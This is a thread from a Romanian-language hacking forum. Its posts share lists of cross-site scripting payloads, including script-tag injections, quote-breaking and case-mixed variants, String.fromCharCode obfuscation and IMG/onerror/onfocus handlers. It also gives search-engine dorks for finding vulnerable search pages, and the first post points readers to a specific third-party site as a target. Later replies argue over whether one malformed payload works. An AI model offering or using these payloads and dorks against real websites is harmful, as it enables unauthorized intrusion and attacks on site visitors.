Jump to content
io.kent

Mai multe metode de xss...

Recommended Posts

Posted (edited)

Pentru cei curiosi, care cauta incontinu, xss sunt mai multe metode, de cautare vi le las aici..

simpla si cunoscuta de majoritate

<script>alert("XSS")</script>

Sau

>script>alert( > XSS DETECTED < )</script>

si acum cateva metode mai putin cunoscute...

String.fromCharCode(88,83,83)

<script>alert(String.fromCharCode(88,83,83))</script>

"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
'><script>alert("XSS")</script>
'><script>alert(String.fromCharCode(88,83,83))</script>
<ScRIPt>aLeRT("XSS")</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
"><ScRIPt>aLeRT("XSS")</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
'><ScRIPt>aLeRT("XSS")</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
</script><script>alert("XSS")</script>
</script><script>alert(String.fromCharCode(88,83,83))</script>
"/><script>alert("XSS")</script>
"/><script>alert(String.fromCharCode(88,83,83))</script>
'/><script>alert("XSS")</script>
'/><script>alert(String.fromCharCode(88,83,83))</script>
</SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,83))
</SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
";alert("XSS");"
";alert(String.fromCharCode(88,83,83));"
';alert("XSS");'
';alert(String.fromCharCode(88,83,83));'
";alert("XSS")
";alert(String.fromCharCode(88,83,83))
';alert("XSS")
';alert(String.fromCharCode(88,83,83))

onmouseover=alert("XSS")

<script>alert(String.fromCharCode(88,83,83))</script>

caractere admise..

> = %3c 
< = %3c
/ = %2f

cateva dorks xss

inurl:search.php?
inurl:find.php?
inurl:search.html
inurl:find.html
inurl:search.aspx
inurl:find.aspx

Edit//

ajutor aici, detali nu dau o sa vati seama la ce va ajuta!

http://www.wocares.com/noquote.php

Edited by io.kent
Posted


';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

'';!--"<XSS>=&{()}

'>//\\,<'>">">"*"

'); alert('XSS

<script>alert(1);</script>

<script>alert('XSS');</script>

<IMG SRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=JaVaScRiPt:alert('XSS')>


<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

'></select><script>alert(123)</script>

<IMG SRC=javascript:alert("XSS")>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<scrscriptipt>alert(1)</scrscriptipt>

<img src=foo.png onerror=alert(/xssed/) />

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<input type="text" AUTOFOCUS onfocus=alert(1)>

Daca tot ai deschis acest topic am pus si eu cateva.

Posted (edited)
>script>alert( > XSS DETECTED < )</script>

Asta nu are cum sa functioneze.

Si ai uitat de regex cand nu se pot introduce ghilimelele( " si sau ').

Edited by eusimplu
Posted
Poate, depinde de filtru.

Ce filtru, nu este logic d.p.d.v. al javascript-ului si nici al HTML-ului! Deschide consola si baga:

alert( > XSS DETECTED < )

Sirurile in Javascript(si in multe alte limbaje) sunt delimitate de ghilimele(' sau ") exceptie in javascript facand caracterul / folosit pentru expresiile regulate.

Fa un fisier html si baga:

>script>alert( > XSS DETECTED < )</script>

Tagurile se deschid cu <> nu cu << si nici logica in XSS nu are, se foloseste > la inchiderea tag-ului de ce naiba nu se foloseste si la deschidere?

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...